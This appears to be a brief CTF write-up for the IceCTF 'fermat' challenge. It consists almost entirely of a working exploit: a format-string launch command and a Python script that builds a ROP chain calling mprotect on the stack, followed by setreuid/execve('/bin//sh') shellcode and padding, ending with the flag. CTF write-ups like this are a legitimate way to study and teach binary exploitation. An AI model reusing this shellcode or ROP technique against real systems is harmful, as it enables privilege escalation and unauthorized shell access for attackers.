Tags: binaryexploitation ropchain stack_pivot
Rating:
Find more @ [original writeup](https://pwnthemole.github.io/2018/09/14/icectffermat.html)
`USER=$(python exploit.py) ./fermat "%14\$hn"`
```
import struct
def p32(address):
return struct.pack("I", address)
# To compute addresses to store args to mprotect
mprotect_base = 0xffff105c
# mprotect requires a page aligned boundary
stackpage_base = 0xffff1000
# setreuid(geteuid(), geteuid()) && execve("/bin//sh", NULL, NULL)
shellcode = "\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46"
shellcode += "\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68"
shellcode += "\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"
movdpedx = 0x08055a2b # mov dword ptr [edx], eax; ret
xoreax = 0x08049743 # xor eax, eax; ret
inceax = 0x0807f1bf # inc eax; ret
popedx = 0x08073bda # pop edx; ret
popeax = 0x080bd026 # pop eax; ret
mprotect = 0x8072c50 # address to mprotect
# The ropchain computes args to mprotect and pushes them
# to the right address in fake stack, which is after mprotect_base.
# mprotect_base is a value I have computed by trial, looking
# at where, after payload injection, mprotect address was loaded
# into fake stack.
ropchain = p32(popedx) + p32(mprotect_base + 4) + p32(popeax)
ropchain += p32(stackpage_base - 1) + p32(inceax) + p32(movdpedx)
ropchain += p32(popedx) + p32(mprotect_base + 8) + p32(xoreax)
ropchain += p32(inceax) + p32(movdpedx) + p32(popedx) + p32(mprotect_base + 12)
ropchain += p32(xoreax) + p32(inceax)*7 + p32(movdpedx) + p32(mprotect)
# mprotect_base + 16 points to the shellcode; we need to ret to it.
# BBBB*3 will be overwritten at runtime by movdpedx gadgets.
ropchain += p32(mprotect_base + 16) + "BBBB"*3
payload = "A"*6394 # Distance between 0xffff0000 - 0x4 and start of USER
payload += p32(0xffff1004) # address to load into esp + 0x4
payload += 'A'*4096 # JUNK
payload += ropchain
payload += shellcode
payload += 'A'*(30000 - len(payload)) # just because I used 30k to compute addresses and experiment.
print(payload)
```
IceCTF{s1ze_matt3rs_n0t}
